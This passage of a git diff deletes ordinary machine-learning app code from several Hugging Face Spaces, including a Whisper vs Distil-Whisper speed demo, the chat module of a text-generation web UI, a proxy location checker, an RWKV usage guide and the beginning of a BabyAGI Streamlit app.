- tracks_all_numpy = np.array(tracks_all) - tracks_all_numpy[:,:4] = np.array(tracks_all)[:,:4]/scale_factor - tracks_all = tracks_all_numpy.tolist() - - segmentation_all_scaled = [] - for list_loop in segmentation_all: - segmentation_all_scaled.append((np.floor_divide(np.array(list_loop),scale_factor)).tolist()) - segmentation_all = segmentation_all_scaled - - if debug == True: - timestamps_final = timestamps_final[:1000] - labels_all = labels_all[:1000] - segmentation_all = segmentation_all[:1000] - tracks_all = tracks_all[:1000] - - unoccluded_indexes, stationary = get_unoccluded_instances(timestamps_final, tracks_all, threshold = 0.05) - if debug == True: - visualize_unoccluded_detection(timestamps_final, tracks_all, segmentation_all, unoccluded_indexes, cwalt_data_path, camera_name) - - tracks_all_unoccluded = [tracks_all[i] for i in unoccluded_indexes] - segmentation_all_unoccluded = [segmentation_all[i] for i in unoccluded_indexes] - labels_all_unoccluded = [labels_all[i] for i in unoccluded_indexes] - timestamps_final_unoccluded = [timestamps_final[i] for i in unoccluded_indexes] - np.savez(json_file_path,tracks_all_unoccluded=tracks_all_unoccluded, segmentation_all_unoccluded=segmentation_all_unoccluded, labels_all_unoccluded=labels_all_unoccluded, timestamps_final_unoccluded=timestamps_final_unoccluded ) - - if debug == True: - repeat_inds_clusters = repeated_indexes(tracks_all_unoccluded,[], repeat_count=1) - visualize_unoccuded_clusters(repeat_inds_clusters, tracks_all_unoccluded, segmentation_all_unoccluded, timestamps_final_unoccluded, cwalt_data_path) - else: - repeat_inds_clusters = repeated_indexes(tracks_all_unoccluded,[], repeat_count=10) - - np.savez(json_file_path + '_clubbed', repeat_inds=repeat_inds_clusters) - np.savez(json_file_path + '_stationary', stationary=stationary) - diff --git a/spaces/distil-whisper/whisper-vs-distil-whisper/app.py b/spaces/distil-whisper/whisper-vs-distil-whisper/app.py deleted file mode 100644 index 64b35c7ed88d9b339139dcb44af4d54bd37d6f6d..0000000000000000000000000000000000000000 --- a/spaces/distil-whisper/whisper-vs-distil-whisper/app.py +++ /dev/null @@ -1,154 +0,0 @@ -from transformers import AutoModelForSpeechSeq2Seq, AutoProcessor, pipeline -from transformers.utils import is_flash_attn_2_available -from transformers.pipelines.audio_utils import ffmpeg_read -import torch -import gradio as gr -import time - -BATCH_SIZE = 16 -MAX_AUDIO_MINS = 30 # maximum audio input in minutes - -device = "cuda:0" if torch.cuda.is_available() else "cpu" -torch_dtype = torch.float16 if torch.cuda.is_available() else torch.float32 -use_flash_attention_2 = is_flash_attn_2_available() - -model = AutoModelForSpeechSeq2Seq.from_pretrained( - "openai/whisper-large-v2", torch_dtype=torch_dtype, low_cpu_mem_usage=True, use_safetensors=True, use_flash_attention_2=use_flash_attention_2 -) -distilled_model = AutoModelForSpeechSeq2Seq.from_pretrained( - "distil-whisper/distil-large-v2", torch_dtype=torch_dtype, low_cpu_mem_usage=True, use_safetensors=True, use_flash_attention_2=use_flash_attention_2 -) - -if not use_flash_attention_2: - # use flash attention from pytorch sdpa - model = model.to_bettertransformer() - distilled_model = distilled_model.to_bettertransformer() - -processor = AutoProcessor.from_pretrained("openai/whisper-large-v2") - -model.to(device) -distilled_model.to(device) - -pipe = pipeline( - "automatic-speech-recognition", - model=model, - tokenizer=processor.tokenizer, - feature_extractor=processor.feature_extractor, - max_new_tokens=128, - chunk_length_s=30, - torch_dtype=torch_dtype, - device=device, - generate_kwargs={"language": "en", "task": "transcribe"}, - return_timestamps=True -) -pipe_forward = pipe._forward - -distil_pipe = pipeline( - "automatic-speech-recognition", - model=distilled_model, - tokenizer=processor.tokenizer, - feature_extractor=processor.feature_extractor, - max_new_tokens=128, - chunk_length_s=15, - torch_dtype=torch_dtype, - device=device, - generate_kwargs={"language": "en", "task": "transcribe"}, -) -distil_pipe_forward = distil_pipe._forward - -def transcribe(inputs): - if inputs is None: - raise gr.Error("No audio file submitted! Please record or upload an audio file before submitting your request.") - - with open(inputs, "rb") as f: - inputs = f.read() - - inputs = ffmpeg_read(inputs, pipe.feature_extractor.sampling_rate) - audio_length_mins = len(inputs) / pipe.feature_extractor.sampling_rate / 60 - - if audio_length_mins > MAX_AUDIO_MINS: - raise gr.Error( - f"To ensure fair usage of the Space, the maximum audio length permitted is {MAX_AUDIO_MINS} minutes." - f"Got an audio of length {round(audio_length_mins, 3)} minutes." - ) - - inputs = {"array": inputs, "sampling_rate": pipe.feature_extractor.sampling_rate} - - def _forward_distil_time(*args, **kwargs): - global distil_runtime - start_time = time.time() - result = distil_pipe_forward(*args, **kwargs) - distil_runtime = time.time() - start_time - distil_runtime = round(distil_runtime, 2) - return result - - distil_pipe._forward = _forward_distil_time - distil_text = distil_pipe(inputs.copy(), batch_size=BATCH_SIZE)["text"] - yield distil_text, distil_runtime, None, None, None - - def _forward_time(*args, **kwargs): - global runtime - start_time = time.time() - result = pipe_forward(*args, **kwargs) - runtime = time.time() - start_time - runtime = round(runtime, 2) - return result - - pipe._forward = _forward_time - text = pipe(inputs, batch_size=BATCH_SIZE)["text"] - - yield distil_text, distil_runtime, text, runtime - -if __name__ == "__main__": - with gr.Blocks() as demo: - gr.HTML( - """ -
      -
      -

      - Whisper vs Distil-Whisper: Speed Comparison -

      -
      -
      - """ - ) - gr.HTML( - f""" -

      Distil-Whisper is a distilled variant - of the Whisper model by OpenAI. Compared to Whisper, - Distil-Whisper runs 6x faster with 50% fewer parameters, while performing to within 1% word error rate (WER) on - out-of-distribution evaluation data.

      - -

      In this demo, we perform a speed comparison between Whisper and Distil-Whisper in order to test this claim. - Both models use the chunked long-form transcription algorithm - in 🤗 Transformers, as well as Flash Attention. To use Distil-Whisper yourself, check the code examples on the - Distil-Whisper repository. To ensure fair - usage of the Space, we ask that audio file inputs are kept to < 30 mins.

      - """ - ) - audio = gr.components.Audio(type="filepath", label="Audio input") - button = gr.Button("Transcribe") - with gr.Row(): - distil_runtime = gr.components.Textbox(label="Distil-Whisper Transcription Time (s)") - runtime = gr.components.Textbox(label="Whisper Transcription Time (s)") - with gr.Row(): - distil_transcription = gr.components.Textbox(label="Distil-Whisper Transcription", show_copy_button=True) - transcription = gr.components.Textbox(label="Whisper Transcription", show_copy_button=True) - button.click( - fn=transcribe, - inputs=audio, - outputs=[distil_transcription, distil_runtime, transcription, runtime], - ) - gr.Markdown("## Examples") - gr.Examples( - [["./assets/example_1.wav"], ["./assets/example_2.wav"]], - audio, - outputs=[distil_transcription, distil_runtime, transcription, runtime], - fn=transcribe, - cache_examples=False, - ) - demo.queue(max_size=10).launch() diff --git a/spaces/doctorsafe/mychat/check_proxy.py b/spaces/doctorsafe/mychat/check_proxy.py deleted file mode 100644 index d6263ad981272b0a798bf278a9e83b99e6928711..0000000000000000000000000000000000000000 --- a/spaces/doctorsafe/mychat/check_proxy.py +++ /dev/null @@ -1,22 +0,0 @@ - -def check_proxy(proxies): - import requests - proxies_https = proxies['https'] if proxies is not None else '无' - try: - response = requests.get("https://ipapi.co/json/", proxies=proxies, timeout=4) - data = response.json() - print(f'查询代理的地理位置,返回的结果是{data}') - country = data['country_name'] - result = f"代理配置 {proxies_https}, 代理所在地:{country}" - print(result) - return result - except: - result = f"代理配置 {proxies_https}, 代理所在地查询超时,代理可能无效" - print(result) - return result - - -if __name__ == '__main__': - try: from config_private import proxies # 放自己的秘密如API和代理网址 os.path.exists('config_private.py') - except: from config import proxies - check_proxy(proxies) \ No newline at end of file diff --git a/spaces/dongyi/MMFS/models/__init__.py b/spaces/dongyi/MMFS/models/__init__.py deleted file mode 100644 index 1e3611e292cc0a2798d5ad2bd1a466356707a77a..0000000000000000000000000000000000000000 --- a/spaces/dongyi/MMFS/models/__init__.py +++ /dev/null @@ -1,68 +0,0 @@ -"""This package contains modules related to objective functions, optimizations, and network architectures. - -To add a custom model class called 'dummy', you need to add a file called 'dummy_model.py' and define a subclass DummyModel inherited from BaseModel. -You need to implement the following five functions: - -- <__init__>: initialize the class; first call BaseModel.__init__(self, opt). - -- : unpack data from dataset and apply preprocessing. - -- : produce intermediate results. - -- : calculate loss, gradients, and update network weights. - -- : (optionally) add model-specific options and set default options. - -In the function <__init__>, you need to define four lists: - -- self.loss_names (str list): specify the training losses that you want to plot and save. - -- self.model_names (str list): define networks used in our training. - -- self.visual_names (str list): specify the images that you want to display and save. - -- self.optimizers (optimizer list): define and initialize optimizers. You can define one optimizer for each network. If two networks are updated at the same time, you can use itertools.chain to group them. See cycle_gan_model.py for an usage. - -Now you can use the model class by specifying flag '--model dummy'. -See our template model class 'template_model.py' for more details. -""" - -import importlib -from models.base_model import BaseModel - - -def find_model_using_name(model_name): - """Import the module "models/[model_name]_model.py". - - In the file, the class called DatasetNameModel() will - be instantiated. It has to be a subclass of BaseModel, - and it is case-insensitive. - """ - model_filename = "models." + model_name + "_model" - modellib = importlib.import_module(model_filename) - #print(modellib) - model = None - target_model_name = model_name.replace('_', '') + 'model' - for name, cls in modellib.__dict__.items(): - if name.lower() == target_model_name.lower() \ - and issubclass(cls, BaseModel): - model = cls - - if model is None: - print("In %s.py, there should be a subclass of BaseModel with class name that matches %s in lowercase." % (model_filename, target_model_name)) - exit(0) - - return model - - -def get_option_setter(model_name): - """Return the static method of the model class.""" - model_class = find_model_using_name(model_name) - return model_class.modify_commandline_options - - -def create_model(config, DDP_device=None): - """Create a model given the option. - - This function warps the class CustomDatasetDataLoader. - This is the main interface between this package and 'train.py'/'test.py' - - Example: - >>> from models import create_model - >>> model = create_model(opt) - """ - model = find_model_using_name(config['common']['model']) - instance = model(config, DDP_device=DDP_device) - print("model [%s] was created" % type(instance).__name__) - return instance diff --git a/spaces/dorkai/text-generation-webui-main/extensions/sd_api_pictures/style.css b/spaces/dorkai/text-generation-webui-main/extensions/sd_api_pictures/style.css deleted file mode 100644 index a10e6397a1a0f5e0fbd98b98d65a572a2290807b..0000000000000000000000000000000000000000 --- a/spaces/dorkai/text-generation-webui-main/extensions/sd_api_pictures/style.css +++ /dev/null @@ -1,25 +0,0 @@ -/* Align the elements for SD_api_picture extension */ -.SDAP #sampler_box { - padding-top: var(--spacing-sm); - padding-bottom: var(--spacing-sm); -} - -.SDAP #seed_box, -.SDAP #cfg_box { - padding-top: var(--spacing-md); -} - -.SDAP #sampler_box span, -.SDAP #seed_box span, -.SDAP #cfg_box span{ - margin-bottom: var(--spacing-sm); -} - -.SDAP svg.dropdown-arrow { - flex-shrink: 0 !important; - margin: 0px !important; -} - -.SDAP .hires_opts input[type="number"] { - width: 6em !important; -} diff --git a/spaces/dorkai/text-generation-webui-main/text-generation-webui-main/docs/RWKV-model.md b/spaces/dorkai/text-generation-webui-main/text-generation-webui-main/docs/RWKV-model.md deleted file mode 100644 index 27db3d10ca98faffee7c254a3244405f8cce2793..0000000000000000000000000000000000000000 --- a/spaces/dorkai/text-generation-webui-main/text-generation-webui-main/docs/RWKV-model.md +++ /dev/null @@ -1,54 +0,0 @@ -> RWKV: RNN with Transformer-level LLM Performance -> -> It combines the best of RNN and transformer - great performance, fast inference, saves VRAM, fast training, "infinite" ctx_len, and free sentence embedding (using the final hidden state). - -https://github.com/BlinkDL/RWKV-LM - -https://github.com/BlinkDL/ChatRWKV - -## Using RWKV in the web UI - -#### 1. Download the model - -It is available in different sizes: - -* https://huggingface.co/BlinkDL/rwkv-4-pile-3b/ -* https://huggingface.co/BlinkDL/rwkv-4-pile-7b/ -* https://huggingface.co/BlinkDL/rwkv-4-pile-14b/ - -There are also older releases with smaller sizes like: - -* https://huggingface.co/BlinkDL/rwkv-4-pile-169m/resolve/main/RWKV-4-Pile-169M-20220807-8023.pth - -Download the chosen `.pth` and put it directly in the `models` folder. - -#### 2. Download the tokenizer - -[20B_tokenizer.json](https://raw.githubusercontent.com/BlinkDL/ChatRWKV/main/v2/20B_tokenizer.json) - -Also put it directly in the `models` folder. Make sure to not rename it. It should be called `20B_tokenizer.json`. - -#### 3. Launch the web UI - -No additional steps are required. Just launch it as you would with any other model. - -``` -python server.py --listen --no-stream --model RWKV-4-Pile-169M-20220807-8023.pth -``` - -## Setting a custom strategy - -It is possible to have very fine control over the offloading and precision for the model with the `--rwkv-strategy` flag. Possible values include: - -``` -"cpu fp32" # CPU mode -"cuda fp16" # GPU mode with float16 precision -"cuda fp16 *30 -> cpu fp32" # GPU+CPU offloading. The higher the number after *, the higher the GPU allocation. -"cuda fp16i8" # GPU mode with 8-bit precision -``` - -See the README for the PyPl package for more details: https://pypi.org/project/rwkv/ - -## Compiling the CUDA kernel - -You can compile the CUDA kernel for the model with `--rwkv-cuda-on`. This should improve the performance a lot but I haven't been able to get it to work yet. \ No newline at end of file diff --git a/spaces/dwolfe66/text-generation-webui-space/modules/chat.py b/spaces/dwolfe66/text-generation-webui-space/modules/chat.py deleted file mode 100644 index bd45b879f92f366255c6f2308ccf135dd61bda1d..0000000000000000000000000000000000000000 --- a/spaces/dwolfe66/text-generation-webui-space/modules/chat.py +++ /dev/null @@ -1,398 +0,0 @@ -import base64 -import copy -import io -import json -import re -from datetime import datetime -from pathlib import Path - -from PIL import Image - -import modules.extensions as extensions_module -import modules.shared as shared -from modules.extensions import apply_extensions -from modules.html_generator import generate_chat_html -from modules.text_generation import encode, generate_reply, get_max_prompt_length - - -# This gets the new line characters right. -def clean_chat_message(text): - text = text.replace('\n', '\n\n') - text = re.sub(r"\n{3,}", "\n\n", text) - text = text.strip() - return text - -def generate_chat_output(history, name1, name2, character): - if shared.args.cai_chat: - return generate_chat_html(history, name1, name2, character) - else: - return history - -def generate_chat_prompt(user_input, max_new_tokens, name1, name2, context, chat_prompt_size, impersonate=False): - user_input = clean_chat_message(user_input) - rows = [f"{context.strip()}\n"] - - if shared.soft_prompt: - chat_prompt_size -= shared.soft_prompt_tensor.shape[1] - max_length = min(get_max_prompt_length(max_new_tokens), chat_prompt_size) - - i = len(shared.history['internal'])-1 - while i >= 0 and len(encode(''.join(rows), max_new_tokens)[0]) < max_length: - rows.insert(1, f"{name2}: {shared.history['internal'][i][1].strip()}\n") - if not (shared.history['internal'][i][0] == '<|BEGIN-VISIBLE-CHAT|>'): - rows.insert(1, f"{name1}: {shared.history['internal'][i][0].strip()}\n") - i -= 1 - - if not impersonate: - rows.append(f"{name1}: {user_input}\n") - rows.append(apply_extensions(f"{name2}:", "bot_prefix")) - limit = 3 - else: - rows.append(f"{name1}:") - limit = 2 - - while len(rows) > limit and len(encode(''.join(rows), max_new_tokens)[0]) >= max_length: - rows.pop(1) - - prompt = ''.join(rows) - return prompt - -def extract_message_from_reply(question, reply, name1, name2, check, impersonate=False): - next_character_found = False - - asker = name1 if not impersonate else name2 - replier = name2 if not impersonate else name1 - - previous_idx = [m.start() for m in re.finditer(f"(^|\n){re.escape(replier)}:", question)] - idx = [m.start() for m in re.finditer(f"(^|\n){re.escape(replier)}:", reply)] - idx = idx[max(len(previous_idx)-1, 0)] - - if not impersonate: - reply = reply[idx + 1 + len(apply_extensions(f"{replier}:", "bot_prefix")):] - else: - reply = reply[idx + 1 + len(f"{replier}:"):] - - if check: - lines = reply.split('\n') - reply = lines[0].strip() - if len(lines) > 1: - next_character_found = True - else: - idx = reply.find(f"\n{asker}:") - if idx != -1: - reply = reply[:idx] - next_character_found = True - reply = clean_chat_message(reply) - - # If something like "\nYo" is generated just before "\nYou:" - # is completed, trim it - next_turn = f"\n{asker}:" - for j in range(len(next_turn)-1, 0, -1): - if reply[-j:] == next_turn[:j]: - reply = reply[:-j] - break - - return reply, next_character_found - -def stop_everything_event(): - shared.stop_everything = True - -def chatbot_wrapper(text, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts=1, regenerate=False): - shared.stop_everything = False - just_started = True - eos_token = '\n' if check else None - name1_original = name1 - if 'pygmalion' in shared.model_name.lower(): - name1 = "You" - - # Check if any extension wants to hijack this function call - visible_text = None - custom_generate_chat_prompt = None - for extension, _ in extensions_module.iterator(): - if hasattr(extension, 'input_hijack') and extension.input_hijack['state'] == True: - extension.input_hijack['state'] = False - text, visible_text = extension.input_hijack['value'] - if custom_generate_chat_prompt is None and hasattr(extension, 'custom_generate_chat_prompt'): - custom_generate_chat_prompt = extension.custom_generate_chat_prompt - - if visible_text is None: - visible_text = text - if shared.args.chat: - visible_text = visible_text.replace('\n', '
      ') - text = apply_extensions(text, "input") - - if custom_generate_chat_prompt is None: - prompt = generate_chat_prompt(text, max_new_tokens, name1, name2, context, chat_prompt_size) - else: - prompt = custom_generate_chat_prompt(text, max_new_tokens, name1, name2, context, chat_prompt_size) - - # Yield *Is typing...* - if not regenerate: - yield shared.history['visible']+[[visible_text, shared.processing_message]] - - # Generate - reply = '' - for i in range(chat_generation_attempts): - for reply in generate_reply(f"{prompt}{' ' if len(reply) > 0 else ''}{reply}", max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, eos_token=eos_token, stopping_string=f"\n{name1}:"): - - # Extracting the reply - reply, next_character_found = extract_message_from_reply(prompt, reply, name1, name2, check) - visible_reply = re.sub("(||{{user}})", name1_original, reply) - visible_reply = apply_extensions(visible_reply, "output") - if shared.args.chat: - visible_reply = visible_reply.replace('\n', '
      ') - - # We need this global variable to handle the Stop event, - # otherwise gradio gets confused - if shared.stop_everything: - return shared.history['visible'] - if just_started: - just_started = False - shared.history['internal'].append(['', '']) - shared.history['visible'].append(['', '']) - - shared.history['internal'][-1] = [text, reply] - shared.history['visible'][-1] = [visible_text, visible_reply] - if not shared.args.no_stream: - yield shared.history['visible'] - if next_character_found: - break - - yield shared.history['visible'] - -def impersonate_wrapper(text, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts=1): - eos_token = '\n' if check else None - - if 'pygmalion' in shared.model_name.lower(): - name1 = "You" - - prompt = generate_chat_prompt(text, max_new_tokens, name1, name2, context, chat_prompt_size, impersonate=True) - - reply = '' - # Yield *Is typing...* - yield shared.processing_message - for i in range(chat_generation_attempts): - for reply in generate_reply(prompt+reply, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, eos_token=eos_token, stopping_string=f"\n{name2}:"): - reply, next_character_found = extract_message_from_reply(prompt, reply, name1, name2, check, impersonate=True) - yield reply - if next_character_found: - break - yield reply - -def cai_chatbot_wrapper(text, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts=1): - for _history in chatbot_wrapper(text, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts): - yield generate_chat_html(_history, name1, name2, shared.character) - -def regenerate_wrapper(text, max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts=1): - if (shared.character != 'None' and len(shared.history['visible']) == 1) or len(shared.history['internal']) == 0: - yield generate_chat_output(shared.history['visible'], name1, name2, shared.character) - else: - last_visible = shared.history['visible'].pop() - last_internal = shared.history['internal'].pop() - # Yield '*Is typing...*' - yield generate_chat_output(shared.history['visible']+[[last_visible[0], shared.processing_message]], name1, name2, shared.character) - for _history in chatbot_wrapper(last_internal[0], max_new_tokens, do_sample, temperature, top_p, typical_p, repetition_penalty, top_k, min_length, no_repeat_ngram_size, num_beams, penalty_alpha, length_penalty, early_stopping, name1, name2, context, check, chat_prompt_size, chat_generation_attempts, regenerate=True): - if shared.args.cai_chat: - shared.history['visible'][-1] = [last_visible[0], _history[-1][1]] - else: - shared.history['visible'][-1] = (last_visible[0], _history[-1][1]) - yield generate_chat_output(shared.history['visible'], name1, name2, shared.character) - -def remove_last_message(name1, name2): - if len(shared.history['visible']) > 0 and not shared.history['internal'][-1][0] == '<|BEGIN-VISIBLE-CHAT|>': - last = shared.history['visible'].pop() - shared.history['internal'].pop() - else: - last = ['', ''] - - if shared.args.cai_chat: - return generate_chat_html(shared.history['visible'], name1, name2, shared.character), last[0] - else: - return shared.history['visible'], last[0] - -def send_last_reply_to_input(): - if len(shared.history['internal']) > 0: - return shared.history['internal'][-1][1] - else: - return '' - -def replace_last_reply(text, name1, name2): - if len(shared.history['visible']) > 0: - if shared.args.cai_chat: - shared.history['visible'][-1][1] = text - else: - shared.history['visible'][-1] = (shared.history['visible'][-1][0], text) - shared.history['internal'][-1][1] = apply_extensions(text, "input") - - return generate_chat_output(shared.history['visible'], name1, name2, shared.character) - -def clear_html(): - return generate_chat_html([], "", "", shared.character) - -def clear_chat_log(name1, name2): - if shared.character != 'None': - found = False - for i in range(len(shared.history['internal'])): - if '<|BEGIN-VISIBLE-CHAT|>' in shared.history['internal'][i][0]: - shared.history['visible'] = [['', apply_extensions(shared.history['internal'][i][1], "output")]] - shared.history['internal'] = [shared.history['internal'][i]] - found = True - break - if not found: - shared.history['visible'] = [] - shared.history['internal'] = [] - else: - shared.history['internal'] = [] - shared.history['visible'] = [] - - return generate_chat_output(shared.history['visible'], name1, name2, shared.character) - -def redraw_html(name1, name2): - return generate_chat_html(shared.history['visible'], name1, name2, shared.character) - -def tokenize_dialogue(dialogue, name1, name2): - _history = [] - - dialogue = re.sub('', '', dialogue) - dialogue = re.sub('', '', dialogue) - dialogue = re.sub('(\n|^)[Aa]non:', '\\1You:', dialogue) - dialogue = re.sub('(\n|^)\[CHARACTER\]:', f'\\g<1>{name2}:', dialogue) - idx = [m.start() for m in re.finditer(f"(^|\n)({re.escape(name1)}|{re.escape(name2)}):", dialogue)] - if len(idx) == 0: - return _history - - messages = [] - for i in range(len(idx)-1): - messages.append(dialogue[idx[i]:idx[i+1]].strip()) - messages.append(dialogue[idx[-1]:].strip()) - - entry = ['', ''] - for i in messages: - if i.startswith(f'{name1}:'): - entry[0] = i[len(f'{name1}:'):].strip() - elif i.startswith(f'{name2}:'): - entry[1] = i[len(f'{name2}:'):].strip() - if not (len(entry[0]) == 0 and len(entry[1]) == 0): - _history.append(entry) - entry = ['', ''] - - print("\033[1;32;1m\nDialogue tokenized to:\033[0;37;0m\n", end='') - for row in _history: - for column in row: - print("\n") - for line in column.strip().split('\n'): - print("| "+line+"\n") - print("|\n") - print("------------------------------") - - return _history - -def save_history(timestamp=True): - prefix = '' if shared.character == 'None' else f"{shared.character}_" - if timestamp: - fname = f"{prefix}{datetime.now().strftime('%Y%m%d-%H%M%S')}.json" - else: - fname = f"{prefix}persistent.json" - if not Path('logs').exists(): - Path('logs').mkdir() - with open(Path(f'logs/{fname}'), 'w', encoding='utf-8') as f: - f.write(json.dumps({'data': shared.history['internal'], 'data_visible': shared.history['visible']}, indent=2)) - return Path(f'logs/{fname}') - -def load_history(file, name1, name2): - file = file.decode('utf-8') - try: - j = json.loads(file) - if 'data' in j: - shared.history['internal'] = j['data'] - if 'data_visible' in j: - shared.history['visible'] = j['data_visible'] - else: - shared.history['visible'] = copy.deepcopy(shared.history['internal']) - # Compatibility with Pygmalion AI's official web UI - elif 'chat' in j: - shared.history['internal'] = [':'.join(x.split(':')[1:]).strip() for x in j['chat']] - if len(j['chat']) > 0 and j['chat'][0].startswith(f'{name2}:'): - shared.history['internal'] = [['<|BEGIN-VISIBLE-CHAT|>', shared.history['internal'][0]]] + [[shared.history['internal'][i], shared.history['internal'][i+1]] for i in range(1, len(shared.history['internal'])-1, 2)] - shared.history['visible'] = copy.deepcopy(shared.history['internal']) - shared.history['visible'][0][0] = '' - else: - shared.history['internal'] = [[shared.history['internal'][i], shared.history['internal'][i+1]] for i in range(0, len(shared.history['internal'])-1, 2)] - shared.history['visible'] = copy.deepcopy(shared.history['internal']) - except: - shared.history['internal'] = tokenize_dialogue(file, name1, name2) - shared.history['visible'] = copy.deepcopy(shared.history['internal']) - -def load_default_history(name1, name2): - if Path('logs/persistent.json').exists(): - load_history(open(Path('logs/persistent.json'), 'rb').read(), name1, name2) - else: - shared.history['internal'] = [] - shared.history['visible'] = [] - -def load_character(_character, name1, name2): - context = "" - shared.history['internal'] = [] - shared.history['visible'] = [] - if _character != 'None': - shared.character = _character - data = json.loads(open(Path(f'characters/{_character}.json'), 'r', encoding='utf-8').read()) - name2 = data['char_name'] - if 'char_persona' in data and data['char_persona'] != '': - context += f"{data['char_name']}'s Persona: {data['char_persona']}\n" - if 'world_scenario' in data and data['world_scenario'] != '': - context += f"Scenario: {data['world_scenario']}\n" - context = f"{context.strip()}\n\n" - if 'example_dialogue' in data and data['example_dialogue'] != '': - data['example_dialogue'] = data['example_dialogue'].replace('{{user}}', name1).replace('{{char}}', name2) - data['example_dialogue'] = data['example_dialogue'].replace('', name1).replace('', name2) - context += f"{data['example_dialogue'].strip()}\n" - if 'char_greeting' in data and len(data['char_greeting'].strip()) > 0: - shared.history['internal'] += [['<|BEGIN-VISIBLE-CHAT|>', data['char_greeting']]] - shared.history['visible'] += [['', apply_extensions(data['char_greeting'], "output")]] - else: - shared.history['internal'] += [['<|BEGIN-VISIBLE-CHAT|>', "Hello there!"]] - shared.history['visible'] += [['', "Hello there!"]] - else: - shared.character = None - context = shared.settings['context_pygmalion'] - name2 = shared.settings['name2_pygmalion'] - - if Path(f'logs/{shared.character}_persistent.json').exists(): - load_history(open(Path(f'logs/{shared.character}_persistent.json'), 'rb').read(), name1, name2) - - if shared.args.cai_chat: - return name2, context, generate_chat_html(shared.history['visible'], name1, name2, shared.character) - else: - return name2, context, shared.history['visible'] - -def upload_character(json_file, img, tavern=False): - json_file = json_file if type(json_file) == str else json_file.decode('utf-8') - data = json.loads(json_file) - outfile_name = data["char_name"] - i = 1 - while Path(f'characters/{outfile_name}.json').exists(): - outfile_name = f'{data["char_name"]}_{i:03d}' - i += 1 - if tavern: - outfile_name = f'TavernAI-{outfile_name}' - with open(Path(f'characters/{outfile_name}.json'), 'w', encoding='utf-8') as f: - f.write(json_file) - if img is not None: - img = Image.open(io.BytesIO(img)) - img.save(Path(f'characters/{outfile_name}.png')) - print(f'New character saved to "characters/{outfile_name}.json".') - return outfile_name - -def upload_tavern_character(img, name1, name2): - _img = Image.open(io.BytesIO(img)) - _img.getexif() - decoded_string = base64.b64decode(_img.info['chara']) - _json = json.loads(decoded_string) - _json = {"char_name": _json['name'], "char_persona": _json['description'], "char_greeting": _json["first_mes"], "example_dialogue": _json['mes_example'], "world_scenario": _json['scenario']} - return upload_character(json.dumps(_json), img, tavern=True) - -def upload_your_profile_picture(img): - img = Image.open(io.BytesIO(img)) - img.save(Path('img_me.png')) - print('Profile picture saved to "img_me.png"') diff --git a/spaces/eaglelandsonce/BabyAGI/app.py b/spaces/eaglelandsonce/BabyAGI/app.py deleted file mode 100644 index 709b22fcccb0c1f7adc0c759877e566ce18a618e..0000000000000000000000000000000000000000 --- a/spaces/eaglelandsonce/BabyAGI/app.py +++ /dev/null @@ -1,265 +0,0 @@ -# imports -import streamlit as st -from PIL import Image -from actors import TaskCreationChain, TaskPrioritizationChain -import os -from collections import deque -from typing import Dict, List, Optional, Any - -from langchain import LLMChain, OpenAI, PromptTemplate -from langchain.embeddings import OpenAIEmbeddings -from langchain.llms import BaseLLM -from langchain.vectorstores.base import VectorStore -from pydantic import BaseModel, Field -from langchain.chains.base import Chain - -from langchain.vectorstores import FAISS -from langchain.docstore import InMemoryDocstore - -# Sidebar inputs for API keys -st.sidebar.header('API Keys') -openai_api_key = st.sidebar.text_input('OpenAI API Key', type="password") -serpapi_api_key = st.sidebar.text_input('SERPAPI API Key', type="password") - - -# implement the FAISS Vector database -if openai_api_key and serpapi_api_key: - os.environ["OPENAI_API_KEY"] = openai_api_key - os.environ["SERPAPI_API_KEY"] = serpapi_api_key - - # Define your embedding model - embeddings_model = OpenAIEmbeddings() - - # Initialize the vectorstore as empty - import faiss - embedding_size = 1536 - index = faiss.IndexFlatL2(embedding_size) - vectorstore = FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {}) - - # With Tools (Execution) - - from langchain.agents import ZeroShotAgent, Tool, AgentExecutor - from langchain import OpenAI, SerpAPIWrapper, LLMChain - todo_prompt = PromptTemplate.from_template("You are a planner who is an expert at coming up with a todo list for a given objective. Come up with a todo list for this objective: {objective}") - todo_chain = LLMChain(llm=OpenAI(temperature=0), prompt=todo_prompt) - search = SerpAPIWrapper() - tools = [ - Tool( - name = "Search", - func=search.run, - description="useful for when you need to answer questions about current events" - ), - Tool( - name = "TODO", - func=todo_chain.run, - description="useful for when you need to come up with todo lists. Input: an objective to create a todo list for. Output: a todo list for that objective. Please be very clear what the objective is!" - ) - ] - - - prefix = """You are an AI who performs one task based on the following objective: {objective}. Take into account these previously completed tasks: {context}.""" - suffix = """Question: {task} - {agent_scratchpad}""" - prompt = ZeroShotAgent.create_prompt( - tools, - prefix=prefix, - suffix=suffix, - input_variables=["objective", "task", "context","agent_scratchpad"] - ) - - - # Baby AGI Controller - - def get_next_task(task_creation_chain: LLMChain, result: Dict, task_description: str, task_list: List[str], objective: str) -> List[Dict]: - """Get the next task.""" - incomplete_tasks = ", ".join(task_list) - response = task_creation_chain.run(result=result, task_description=task_description, incomplete_tasks=incomplete_tasks, objective=objective) - new_tasks = response.split('\n') - return [{"task_name": task_name} for task_name in new_tasks if task_name.strip()] - - #prioritization loop - - def prioritize_tasks(task_prioritization_chain: LLMChain, this_task_id: int, task_list: 